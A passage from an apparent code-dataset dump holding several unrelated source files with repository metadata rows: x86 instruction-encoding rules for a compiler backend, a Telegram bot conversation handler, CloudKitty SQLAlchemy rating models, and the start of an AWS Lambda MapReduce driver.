enc_both(base.load.f32.any, r.fldDisp32, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndex, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndexDisp8, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndexDisp32, 0xf3, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fld, 0xf2, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fldDisp8, 0xf2, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fldDisp32, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndex, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndexDisp8, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndexDisp32, 0xf2, 0x0f, 0x10)
enc_both(base.store.f32.any, r.fst, 0xf3, 0x0f, 0x11)
enc_both(base.store.f32.any, r.fstDisp8, 0xf3, 0x0f, 0x11)
enc_both(base.store.f32.any, r.fstDisp32, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndex, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndexDisp8, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndexDisp32, 0xf3, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fst, 0xf2, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fstDisp8, 0xf2, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fstDisp32, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndex, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndexDisp8, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndexDisp32, 0xf2, 0x0f, 0x11)
enc_both(base.fill.f32, r.ffillSib32, 0xf3, 0x0f, 0x10)
enc_both(base.regfill.f32, r.fregfill32, 0xf3, 0x0f, 0x10)
enc_both(base.fill.f64, r.ffillSib32, 0xf2, 0x0f, 0x10)
enc_both(base.regfill.f64, r.fregfill32, 0xf2, 0x0f, 0x10)
enc_both(base.spill.f32, r.fspillSib32, 0xf3, 0x0f, 0x11)
enc_both(base.regspill.f32, r.fregspill32, 0xf3, 0x0f, 0x11)
enc_both(base.spill.f64, r.fspillSib32, 0xf2, 0x0f, 0x11)
enc_both(base.regspill.f64, r.fregspill32, 0xf2, 0x0f, 0x11)
#
# Function addresses.
#
# Non-PIC, all-ones funcaddresses.
X86_32.enc(base.func_addr.i32, *r.fnaddr4(0xb8),
isap=not_all_ones_funcaddrs_and_not_is_pic)
X86_64.enc(base.func_addr.i64, *r.fnaddr8.rex(0xb8, w=1),
isap=not_all_ones_funcaddrs_and_not_is_pic)
# Non-PIC, all-zeros funcaddresses.
X86_32.enc(base.func_addr.i32, *r.allones_fnaddr4(0xb8),
isap=all_ones_funcaddrs_and_not_is_pic)
X86_64.enc(base.func_addr.i64, *r.allones_fnaddr8.rex(0xb8, w=1),
isap=all_ones_funcaddrs_and_not_is_pic)
# 64-bit, colocated, both PIC and non-PIC. Use the lea instruction's
# pc-relative field.
X86_64.enc(base.func_addr.i64, *r.pcrel_fnaddr8.rex(0x8d, w=1),
instp=IsColocatedFunc(FuncAddr.func_ref))
# 64-bit, non-colocated, PIC.
X86_64.enc(base.func_addr.i64, *r.got_fnaddr8.rex(0x8b, w=1),
isap=is_pic)
#
# Global addresses.
#
# Non-PIC
X86_32.enc(base.symbol_value.i32, *r.gvaddr4(0xb8),
isap=not_is_pic)
X86_64.enc(base.symbol_value.i64, *r.gvaddr8.rex(0xb8, w=1),
isap=not_is_pic)
# PIC, colocated
X86_64.enc(base.symbol_value.i64, *r.pcrel_gvaddr8.rex(0x8d, w=1),
isap=is_pic,
instp=IsColocatedData())
# PIC, non-colocated
X86_64.enc(base.symbol_value.i64, *r.got_gvaddr8.rex(0x8b, w=1),
isap=is_pic)
#
# Stack addresses.
#
# TODO: Add encoding rules for stack_load and stack_store, so that they
# don't get legalized to stack_addr + load/store.
#
X86_32.enc(base.stack_addr.i32, *r.spaddr4_id(0x8d))
X86_64.enc(base.stack_addr.i64, *r.spaddr8_id.rex(0x8d, w=1))
#
# Call/return
#
# 32-bit, both PIC and non-PIC.
X86_32.enc(base.call, *r.call_id(0xe8))
# 64-bit, colocated, both PIC and non-PIC. Use the call instruction's
# pc-relative field.
X86_64.enc(base.call, *r.call_id(0xe8),
instp=IsColocatedFunc(Call.func_ref))
# 64-bit, non-colocated, PIC. There is no 64-bit non-colocated non-PIC version,
# since non-PIC is currently using the large model, which requires calls be
# lowered to func_addr+call_indirect.
X86_64.enc(base.call, *r.call_plt_id(0xe8), isap=is_pic)
X86_32.enc(base.call_indirect.i32, *r.call_r(0xff, rrr=2))
X86_64.enc(base.call_indirect.i64, *r.call_r.rex(0xff, rrr=2))
X86_64.enc(base.call_indirect.i64, *r.call_r(0xff, rrr=2))
X86_32.enc(base.x_return, *r.ret(0xc3))
X86_64.enc(base.x_return, *r.ret(0xc3))
#
# Branches
#
enc_both(base.jump, r.jmpb, 0xeb)
enc_both(base.jump, r.jmpd, 0xe9)
enc_both(base.brif, r.brib, 0x70)
enc_both(base.brif, r.brid, 0x0f, 0x80)
# Not all float condition codes are legal, see `supported_floatccs`.
enc_both(base.brff, r.brfb, 0x70)
enc_both(base.brff, r.brfd, 0x0f, 0x80)
# Note that the tjccd opcode will be prefixed with 0x0f.
enc_i32_i64(base.brz, r.tjccb, 0x74)
enc_i32_i64(base.brz, r.tjccd, 0x84)
enc_i32_i64(base.brnz, r.tjccb, 0x75)
enc_i32_i64(base.brnz, r.tjccd, 0x85)
# Branch on a b1 value in a register only looks at the low 8 bits. See also
# bint encodings below.
#
# Start with the worst-case encoding for X86_32 only. The register allocator
# can't handle a branch with an ABCD-constrained operand.
X86_32.enc(base.brz.b1, *r.t8jccd_long(0x84))
X86_32.enc(base.brnz.b1, *r.t8jccd_long(0x85))
enc_both(base.brz.b1, r.t8jccb_abcd, 0x74)
enc_both(base.brz.b1, r.t8jccd_abcd, 0x84)
enc_both(base.brnz.b1, r.t8jccb_abcd, 0x75)
enc_both(base.brnz.b1, r.t8jccd_abcd, 0x85)
#
# Jump tables
#
X86_64.enc(base.jump_table_entry.i64.any.any, *r.jt_entry.rex(0x63, w=1))
X86_32.enc(base.jump_table_entry.i32.any.any, *r.jt_entry(0x8b))
X86_64.enc(base.jump_table_base.i64, *r.jt_base.rex(0x8d, w=1))
X86_32.enc(base.jump_table_base.i32, *r.jt_base(0x8d))
enc_x86_64(base.indirect_jump_table_br.i64, r.indirect_jmp, 0xff, rrr=4)
X86_32.enc(base.indirect_jump_table_br.i32, *r.indirect_jmp(0xff, rrr=4))
#
# Trap as ud2
#
X86_32.enc(base.trap, *r.trap(0x0f, 0x0b))
X86_64.enc(base.trap, *r.trap(0x0f, 0x0b))
# Debug trap as int3
X86_32.enc(base.debugtrap, r.debugtrap, 0)
X86_64.enc(base.debugtrap, r.debugtrap, 0)
# Using a standard EncRecipe, not the TailRecipe.
X86_32.enc(base.trapif, r.trapif, 0)
X86_64.enc(base.trapif, r.trapif, 0)
X86_32.enc(base.trapff, r.trapff, 0)
X86_64.enc(base.trapff, r.trapff, 0)
#
# Comparisons
#
enc_i32_i64(base.icmp, r.icscc, 0x39)
enc_i32_i64(base.icmp_imm, r.icscc_ib, 0x83, rrr=7)
enc_i32_i64(base.icmp_imm, r.icscc_id, 0x81, rrr=7)
enc_i32_i64(base.ifcmp, r.rcmp, 0x39)
enc_i32_i64(base.ifcmp_imm, r.rcmp_ib, 0x83, rrr=7)
enc_i32_i64(base.ifcmp_imm, r.rcmp_id, 0x81, rrr=7)
# TODO: We could special-case ifcmp_imm(x, 0) to TEST(x, x).
X86_32.enc(base.ifcmp_sp.i32, *r.rcmp_sp(0x39))
X86_64.enc(base.ifcmp_sp.i64, *r.rcmp_sp.rex(0x39, w=1))
#
# Convert flags to bool.
#
# This encodes `b1` as an 8-bit low register with the value 0 or 1.
enc_both(base.trueif, r.seti_abcd, 0x0f, 0x90)
enc_both(base.trueff, r.setf_abcd, 0x0f, 0x90)
#
# Conditional move (a.k.a integer select)
#
enc_i32_i64(base.selectif, r.cmov, 0x0F, 0x40)
#
# Bit scan forwards and reverse
#
enc_i32_i64(x86.bsf, r.bsf_and_bsr, 0x0F, 0xBC)
enc_i32_i64(x86.bsr, r.bsf_and_bsr, 0x0F, 0xBD)
#
# Convert bool to int.
#
# This assumes that b1 is represented as an 8-bit low register with the value 0
# or 1.
#
# Encode movzbq as movzbl, because it's equivalent and shorter.
X86_32.enc(base.bint.i32.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.bint.i64.b1, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.bint.i64.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.bint.i32.b1, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.bint.i32.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
# Numerical conversions.
# Reducing an integer is a no-op.
X86_32.enc(base.ireduce.i8.i16, r.null, 0)
X86_32.enc(base.ireduce.i8.i32, r.null, 0)
X86_32.enc(base.ireduce.i16.i32, r.null, 0)
X86_64.enc(base.ireduce.i8.i16, r.null, 0)
X86_64.enc(base.ireduce.i8.i32, r.null, 0)
X86_64.enc(base.ireduce.i16.i32, r.null, 0)
X86_64.enc(base.ireduce.i8.i64, r.null, 0)
X86_64.enc(base.ireduce.i16.i64, r.null, 0)
X86_64.enc(base.ireduce.i32.i64, r.null, 0)
# TODO: Add encodings for cbw, cwde, cdqe, which are sign-extending
# instructions for %al/%ax/%eax to %ax/%eax/%rax.
# movsbl
X86_32.enc(base.sextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xbe))
X86_64.enc(base.sextend.i32.i8, *r.urm_noflags.rex(0x0f, 0xbe))
X86_64.enc(base.sextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xbe))
# movswl
X86_32.enc(base.sextend.i32.i16, *r.urm_noflags(0x0f, 0xbf))
X86_64.enc(base.sextend.i32.i16, *r.urm_noflags.rex(0x0f, 0xbf))
X86_64.enc(base.sextend.i32.i16, *r.urm_noflags(0x0f, 0xbf))
# movsbq
X86_64.enc(base.sextend.i64.i8, *r.urm_noflags.rex(0x0f, 0xbe, w=1))
# movswq
X86_64.enc(base.sextend.i64.i16, *r.urm_noflags.rex(0x0f, 0xbf, w=1))
# movslq
X86_64.enc(base.sextend.i64.i32, *r.urm_noflags.rex(0x63, w=1))
# movzbl
X86_32.enc(base.uextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.uextend.i32.i8, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.uextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
# movzwl
X86_32.enc(base.uextend.i32.i16, *r.urm_noflags(0x0f, 0xb7))
X86_64.enc(base.uextend.i32.i16, *r.urm_noflags.rex(0x0f, 0xb7))
X86_64.enc(base.uextend.i32.i16, *r.urm_noflags(0x0f, 0xb7))
# movzbq, encoded as movzbl because it's equivalent and shorter
X86_64.enc(base.uextend.i64.i8, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.uextend.i64.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
# movzwq, encoded as movzwl because it's equivalent and shorter
X86_64.enc(base.uextend.i64.i16, *r.urm_noflags.rex(0x0f, 0xb7))
X86_64.enc(base.uextend.i64.i16, *r.urm_noflags(0x0f, 0xb7))
# A 32-bit register copy clears the high 32 bits.
X86_64.enc(base.uextend.i64.i32, *r.umr.rex(0x89))
X86_64.enc(base.uextend.i64.i32, *r.umr(0x89))
#
# Floating point
#
# floating-point constants equal to 0.0 can be encoded using either
# `xorps` or `xorpd`, for 32-bit and 64-bit floats respectively.
X86_32.enc(base.f32const, *r.f32imm_z(0x0f, 0x57),
instp=IsZero32BitFloat(UnaryIeee32.imm))
X86_32.enc(base.f64const, *r.f64imm_z(0x66, 0x0f, 0x57),
instp=IsZero64BitFloat(UnaryIeee64.imm))
enc_x86_64_instp(base.f32const, r.f32imm_z,
IsZero32BitFloat(UnaryIeee32.imm), 0x0f, 0x57)
enc_x86_64_instp(base.f64const, r.f64imm_z,
IsZero64BitFloat(UnaryIeee64.imm), 0x66, 0x0f, 0x57)
# movd
enc_both(base.bitcast.f32.i32, r.frurm, 0x66, 0x0f, 0x6e)
enc_both(base.bitcast.i32.f32, r.rfumr, 0x66, 0x0f, 0x7e)
# movq
X86_64.enc(base.bitcast.f64.i64, *r.frurm.rex(0x66, 0x0f, 0x6e, w=1))
X86_64.enc(base.bitcast.i64.f64, *r.rfumr.rex(0x66, 0x0f, 0x7e, w=1))
# movaps
enc_both(base.copy.f32, r.furm, 0x0f, 0x28)
enc_both(base.copy.f64, r.furm, 0x0f, 0x28)
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_32.enc(base.regmove.f32, *r.frmov(0x0f, 0x28))
X86_64.enc(base.regmove.f32, *r.frmov.rex(0x0f, 0x28))
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_32.enc(base.regmove.f64, *r.frmov(0x0f, 0x28))
X86_64.enc(base.regmove.f64, *r.frmov.rex(0x0f, 0x28))
# cvtsi2ss
enc_i32_i64(base.fcvt_from_sint.f32, r.frurm, 0xf3, 0x0f, 0x2a)
# cvtsi2sd
enc_i32_i64(base.fcvt_from_sint.f64, r.frurm, 0xf2, 0x0f, 0x2a)
# cvtss2sd
enc_both(base.fpromote.f64.f32, r.furm, 0xf3, 0x0f, 0x5a)
# cvtsd2ss
enc_both(base.fdemote.f32.f64, r.furm, 0xf2, 0x0f, 0x5a)
# cvttss2si
enc_both(x86.cvtt2si.i32.f32, r.rfurm, 0xf3, 0x0f, 0x2c)
X86_64.enc(x86.cvtt2si.i64.f32, *r.rfurm.rex(0xf3, 0x0f, 0x2c, w=1))
# cvttsd2si
enc_both(x86.cvtt2si.i32.f64, r.rfurm, 0xf2, 0x0f, 0x2c)
X86_64.enc(x86.cvtt2si.i64.f64, *r.rfurm.rex(0xf2, 0x0f, 0x2c, w=1))
# Exact square roots.
enc_both(base.sqrt.f32, r.furm, 0xf3, 0x0f, 0x51)
enc_both(base.sqrt.f64, r.furm, 0xf2, 0x0f, 0x51)
# Rounding. The recipe looks at the opcode to pick an immediate.
for inst in [
base.nearest,
base.floor,
base.ceil,
base.trunc]:
enc_both(inst.f32, r.furmi_rnd, 0x66, 0x0f, 0x3a, 0x0a, isap=use_sse41)
enc_both(inst.f64, r.furmi_rnd, 0x66, 0x0f, 0x3a, 0x0b, isap=use_sse41)
# Binary arithmetic ops.
for inst, opc in [
(base.fadd, 0x58),
(base.fsub, 0x5c),
(base.fmul, 0x59),
(base.fdiv, 0x5e),
(x86.fmin, 0x5d),
(x86.fmax, 0x5f)]:
enc_both(inst.f32, r.fa, 0xf3, 0x0f, opc)
enc_both(inst.f64, r.fa, 0xf2, 0x0f, opc)
# Binary bitwise ops.
for inst, opc in [
(base.band, 0x54),
(base.bor, 0x56),
(base.bxor, 0x57)]:
enc_both(inst.f32, r.fa, 0x0f, opc)
enc_both(inst.f64, r.fa, 0x0f, opc)
# The `andnps(x,y)` instruction computes `~x&y`, while `band_not(x,y)` is `x&~y`.
enc_both(base.band_not.f32, r.fax, 0x0f, 0x55)
enc_both(base.band_not.f64, r.fax, 0x0f, 0x55)
# Comparisons.
#
# This only covers the condition codes in `supported_floatccs`, the rest are
# handled by legalization patterns.
enc_both(base.fcmp.f32, r.fcscc, 0x0f, 0x2e)
enc_both(base.fcmp.f64, r.fcscc, 0x66, 0x0f, 0x2e)
enc_both(base.ffcmp.f32, r.fcmp, 0x0f, 0x2e)
enc_both(base.ffcmp.f64, r.fcmp, 0x66, 0x0f, 0x2e)
| 36.135819 | 79 | 0.712027 |
50a31a1c09aa002260757b7c74d5c46a730e8184 | 1,337 | py | Python | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | null | null | null | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | 4 | 2020-08-03T15:50:48.000Z | 2020-11-01T06:05:38.000Z | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | null | null | null | from telegram.ext import ConversationHandler, CommandHandler, MessageHandler, Filters
from conversations.callbacks.add_task import add_task_conv_start, add_task_conv_ask_name, \
add_task_conv_ask_participants
from conversations.commands import MainCommands
from conversations.common import TIMEOUT_DURATION
from conversations.handlers.common import TIMEOUT_HANDLER, CANCEL_HANDLER, INVALID_COMMAND_HANDLER
from conversations.states import AddTaskConvState
# Entry point: the /add_task command starts the conversation.
ADD_TASK_START_HANDLER = CommandHandler(MainCommands.ADD_TASK.value, add_task_conv_start)
# Plain-text (non-command) replies provide the task name, then the participants.
ADD_TASK_ASK_NAME_HANDLER = MessageHandler(filters=Filters.text & ~Filters.command, callback=add_task_conv_ask_name)
ADD_TASK_ASK_PARTICIPANTS_HANDLER = MessageHandler(filters=Filters.text & ~Filters.command,
                                                   callback=add_task_conv_ask_participants)
# State machine for adding a task: ask for the name, then the participants.
# Shared per chat (per_user=False) so any chat member may answer; expires
# after TIMEOUT_DURATION of inactivity via the TIMEOUT handler.
ADD_TASK_CONVERSATION_HANDLER = ConversationHandler(
    name='add_task_conv',
    entry_points=[ADD_TASK_START_HANDLER],
    states={
        AddTaskConvState.ASK_NAME: [ADD_TASK_ASK_NAME_HANDLER],
        AddTaskConvState.ASK_PARTICIPANTS: [ADD_TASK_ASK_PARTICIPANTS_HANDLER],
        ConversationHandler.TIMEOUT: [TIMEOUT_HANDLER]
    },
    fallbacks=[CANCEL_HANDLER, INVALID_COMMAND_HANDLER],
    per_chat=True,
    per_user=False,
    conversation_timeout=TIMEOUT_DURATION
)
2cb5c65df4cfca25feb4e40871ffdf9da12ca65d | 10,805 | py | Python | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Stéphane Albert
#
from oslo_db.sqlalchemy import models
import sqlalchemy
from sqlalchemy.ext import declarative
from sqlalchemy import orm
from sqlalchemy import schema
# Shared declarative base for all hashmap ORM models in this module.
Base = declarative.declarative_base()
class HashMapBase(models.ModelBase):
    """Behaviour shared by every hashmap ORM model."""
    __table_args__ = {'mysql_charset': "utf8",
                      'mysql_engine': "InnoDB"}
    # Exported name -> dotted attribute path; used by export_model() to
    # replace internal foreign-key ids with their resolved public values.
    fk_to_resolve = {}
    def save(self, session=None):
        """Persist the row, creating a default session when none is given."""
        # Imported lazily to avoid a circular import at module load time.
        from cloudkitty import db
        if session is None:
            session = db.get_session()
        super(HashMapBase, self).save(session=session)
    def as_dict(self):
        """Return the row as a dict, excluding the internal 'id' column."""
        return dict((col.name, self[col.name])
                    for col in self.__table__.columns
                    if col.name != 'id')
    def _recursive_resolve(self, path):
        """Follow the dotted attribute ``path``; None if any step is missing."""
        target = self
        for attr in path.split('.'):
            target = getattr(target, attr, None)
            if target is None:
                return None
        return target
    def export_model(self):
        """Return as_dict() with foreign keys swapped for resolved values."""
        exported = self.as_dict()
        exported.update(
            (name, self._recursive_resolve(dotted))
            for name, dotted in self.fk_to_resolve.items())
        return exported
class HashMapService(Base, HashMapBase):
    """A hashmap service.

    Root object grouping the fields, mappings and thresholds attached
    to one rated service; exposed through its ``service_id`` UUID.
    """
    __tablename__ = 'hashmap_services'
    # Internal primary key; not exposed by export_model().
    id = sqlalchemy.Column(sqlalchemy.Integer,
                           primary_key=True)
    # Public UUID of the service.
    service_id = sqlalchemy.Column(sqlalchemy.String(36),
                                   nullable=False,
                                   unique=True)
    name = sqlalchemy.Column(
        sqlalchemy.String(255),
        nullable=False,
        unique=True)
    # Child collections; each backref gives the child a `.service` attribute
    # loaded eagerly (lazy='immediate').
    fields = orm.relationship('HashMapField',
                              backref=orm.backref(
                                  'service',
                                  lazy='immediate'))
    mappings = orm.relationship('HashMapMapping',
                                backref=orm.backref(
                                    'service',
                                    lazy='immediate'))
    thresholds = orm.relationship('HashMapThreshold',
                                  backref=orm.backref(
                                      'service',
                                      lazy='immediate'))
    def __repr__(self):
        return ('<HashMapService[{uuid}]: '
                'service={service}>').format(
                    uuid=self.service_id,
                    service=self.name)
class HashMapField(Base, HashMapBase):
    """A hashmap field.

    A named attribute of a service whose per-value mappings/thresholds
    drive the rating; exposed through its ``field_id`` UUID.
    """
    __tablename__ = 'hashmap_fields'
    # export_model() replaces the integer FK with the service's UUID.
    fk_to_resolve = {'service_id': 'service.service_id'}
    @declarative.declared_attr
    def __table_args__(cls):
        # Field names must be unique per service; merge in the base
        # engine/charset options as the last tuple element.
        args = (schema.UniqueConstraint('field_id', 'name',
                                        name='uniq_field'),
                schema.UniqueConstraint('service_id', 'name',
                                        name='uniq_map_service_field'),
                HashMapBase.__table_args__,)
        return args
    id = sqlalchemy.Column(sqlalchemy.Integer,
                           primary_key=True)
    # Public UUID of the field.
    field_id = sqlalchemy.Column(sqlalchemy.String(36),
                                 nullable=False,
                                 unique=True)
    name = sqlalchemy.Column(sqlalchemy.String(255),
                             nullable=False)
    # Owning service; rows are removed when the service is deleted.
    service_id = sqlalchemy.Column(
        sqlalchemy.Integer,
        sqlalchemy.ForeignKey('hashmap_services.id',
                              ondelete='CASCADE'),
        nullable=False)
    mappings = orm.relationship('HashMapMapping',
                                backref=orm.backref(
                                    'field',
                                    lazy='immediate'))
    thresholds = orm.relationship('HashMapThreshold',
                                  backref=orm.backref(
                                      'field',
                                      lazy='immediate'))
    def __repr__(self):
        return ('<HashMapField[{uuid}]: '
                'field={field}>').format(
                    uuid=self.field_id,
                    field=self.name)
class HashMapGroup(Base, HashMapBase):
    """A grouping of hashmap calculations.

    Mappings and thresholds may reference a group so their rated
    amounts are aggregated together; exposed through ``group_id``.
    """
    __tablename__ = 'hashmap_groups'
    id = sqlalchemy.Column(sqlalchemy.Integer,
                           primary_key=True)
    # Public UUID of the group.
    group_id = sqlalchemy.Column(sqlalchemy.String(36),
                                 nullable=False,
                                 unique=True)
    name = sqlalchemy.Column(sqlalchemy.String(255),
                             nullable=False,
                             unique=True)
    mappings = orm.relationship('HashMapMapping',
                                backref=orm.backref(
                                    'group',
                                    lazy='immediate'))
    thresholds = orm.relationship('HashMapThreshold',
                                  backref=orm.backref(
                                      'group',
                                      lazy='immediate'))
    def __repr__(self):
        return ('<HashMapGroup[{uuid}]: '
                'name={name}>').format(
                    uuid=self.group_id,
                    name=self.name)
class HashMapMapping(Base, HashMapBase):
    """A mapping between a field, a value and a type.

    Associates a cost (flat or rate) with either a whole service or a
    specific field value; optionally attached to a group.
    """
    __tablename__ = 'hashmap_maps'
    # export_model() replaces the integer FKs with the public UUIDs.
    fk_to_resolve = {'service_id': 'service.service_id',
                     'field_id': 'field.field_id',
                     'group_id': 'group.group_id'}
    @declarative.declared_attr
    def __table_args__(cls):
        # A given value may be mapped only once per field and once per
        # service; merge in the base engine/charset options last.
        args = (schema.UniqueConstraint('value', 'field_id',
                                        name='uniq_field_mapping'),
                schema.UniqueConstraint('value', 'service_id',
                                        name='uniq_service_mapping'),
                HashMapBase.__table_args__,)
        return args
    id = sqlalchemy.Column(sqlalchemy.Integer,
                           primary_key=True)
    # Public UUID of the mapping.
    mapping_id = sqlalchemy.Column(sqlalchemy.String(36),
                                   nullable=False,
                                   unique=True)
    # Matched field value; NULL for service-wide (default) mappings.
    value = sqlalchemy.Column(sqlalchemy.String(255),
                              nullable=True)
    cost = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
                             nullable=False)
    # 'flat' adds a fixed amount, 'rate' multiplies the metered quantity.
    map_type = sqlalchemy.Column(sqlalchemy.Enum('flat',
                                                 'rate',
                                                 name='enum_map_type'),
                                 nullable=False)
    # Exactly one of service_id/field_id is expected to be set by callers
    # (both columns are nullable at the schema level).
    service_id = sqlalchemy.Column(sqlalchemy.Integer,
                                   sqlalchemy.ForeignKey('hashmap_services.id',
                                                         ondelete='CASCADE'),
                                   nullable=True)
    field_id = sqlalchemy.Column(sqlalchemy.Integer,
                                 sqlalchemy.ForeignKey('hashmap_fields.id',
                                                       ondelete='CASCADE'),
                                 nullable=True)
    # Deleting a group detaches its mappings instead of removing them.
    group_id = sqlalchemy.Column(sqlalchemy.Integer,
                                 sqlalchemy.ForeignKey('hashmap_groups.id',
                                                       ondelete='SET NULL'),
                                 nullable=True)
    def __repr__(self):
        return ('<HashMapMapping[{uuid}]: '
                'type={map_type} {value}={cost}>').format(
                    uuid=self.mapping_id,
                    map_type=self.map_type,
                    value=self.value,
                    cost=self.cost)
class HashMapThreshold(Base, HashMapBase):
    """A threshold matching a service or a field with a level and a type.

    Like a mapping, but triggered when the metered quantity reaches a
    numeric ``level`` instead of matching an exact value.
    """
    __tablename__ = 'hashmap_thresholds'
    # export_model() replaces the integer FKs with the public UUIDs.
    fk_to_resolve = {'service_id': 'service.service_id',
                     'field_id': 'field.field_id',
                     'group_id': 'group.group_id'}
    @declarative.declared_attr
    def __table_args__(cls):
        # A given level may appear only once per field and once per
        # service; merge in the base engine/charset options last.
        args = (schema.UniqueConstraint('level', 'field_id',
                                        name='uniq_field_threshold'),
                schema.UniqueConstraint('level', 'service_id',
                                        name='uniq_service_threshold'),
                HashMapBase.__table_args__,)
        return args
    id = sqlalchemy.Column(sqlalchemy.Integer,
                           primary_key=True)
    # Public UUID of the threshold.
    threshold_id = sqlalchemy.Column(sqlalchemy.String(36),
                                     nullable=False,
                                     unique=True)
    # Quantity at which this threshold applies.
    level = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
                              nullable=True)
    cost = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
                             nullable=False)
    # 'flat' adds a fixed amount, 'rate' multiplies the metered quantity.
    map_type = sqlalchemy.Column(sqlalchemy.Enum('flat',
                                                 'rate',
                                                 name='enum_map_type'),
                                 nullable=False)
    service_id = sqlalchemy.Column(sqlalchemy.Integer,
                                   sqlalchemy.ForeignKey('hashmap_services.id',
                                                         ondelete='CASCADE'),
                                   nullable=True)
    field_id = sqlalchemy.Column(sqlalchemy.Integer,
                                 sqlalchemy.ForeignKey('hashmap_fields.id',
                                                       ondelete='CASCADE'),
                                 nullable=True)
    # Deleting a group detaches its thresholds instead of removing them.
    group_id = sqlalchemy.Column(sqlalchemy.Integer,
                                 sqlalchemy.ForeignKey('hashmap_groups.id',
                                                       ondelete='SET NULL'),
                                 nullable=True)
    def __repr__(self):
        return ('<HashMapThreshold[{uuid}]: '
                'type={map_type} {level}={cost}>').format(
                    uuid=self.threshold_id,
                    map_type=self.map_type,
                    level=self.level,
                    cost=self.cost)
a0754bd03e8968964e19d501ab68a866365e9d03 | 8,577 | py | Python | src/python/driver.py | kmu-bigdata/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
"MIT-0"
] | 1 | 2020-11-05T10:00:15.000Z | 2020-11-05T10:00:15.000Z | src/python/driver.py | manchann/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
"MIT-0"
] | null | null | null | src/python/driver.py | manchann/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
"MIT-0"
] | 1 | 2020-11-11T02:16:52.000Z | 2020-11-11T02:16:52.000Z | #-*- coding: utf-8 -*-
'''
Driver to start BigLambda Job
* Copyright 2016, Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Amazon Software License (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/asl/
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
'''
import boto3
import json
import math
import random
import re
from io import StringIO
import sys
import time
import lambdautils
import glob
import subprocess
from multiprocessing.dummy import Pool as ThreadPool
from functools import partial
from botocore.client import Config
# create an S3 session
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
# Local job-config file packaged into every Lambda zip (see zipLambda).
JOB_INFO = 'jobinfo.json'
### utils ####
# Package the handler source plus the shared job files into a zip archive.
def zipLambda(fname, zipname):
    # Shelling out to `zip` is faster than Python's zipfile module.
    members = glob.glob(fname) + glob.glob(JOB_INFO) + glob.glob("lambdautils.py")
    subprocess.call(['zip', zipname] + members)
